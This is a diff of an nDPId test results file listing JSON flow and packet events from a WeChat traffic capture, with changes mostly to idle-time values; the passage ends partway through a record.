00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1492167788126,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167788126,"pkt":"AQBeAAD70CeIF3AECABFoABEPYcAAAER2HrAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} @@ -403,19 +402,20 @@ 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795292,"flow_last_seen":1492167795292,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492167795292,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1492167795294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795294,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdEAAIARc3rAqAFkwKgB\/wCJAIkAOgw8\/wABEAABAAAAAAAAIEVORURGS0ZFRU5GQUVMRURDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1492167795295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1492167795295,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoABOQdIAAIARc3nAqAFkwKgB\/wCJAIkAOio7\/wEBEAABAAAAAAAAIEVERUJFT0ZERUJGQkVERkJDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1383,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1492167796728,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167802662,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1492167815567,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167815567,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9sAAAEC8bDAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1492167820408,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1492167820408,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167648494,"flow_last_seen":1492167695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1492167848542,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -434,41 +434,41 @@ 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1492167852023,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":110,"pkt_l4_len":48,"thread_ts_msec":1492167852023,"pkt":"MzMAAAAWuHgu4toHht1gAAAAADgAAf6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAPHlAAAAAgQAAAD\/AgAAAAAAAAAAAAL\/tFRbBAAAAP8CAAAAAAAAAAAAAf+GbFs="} 00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 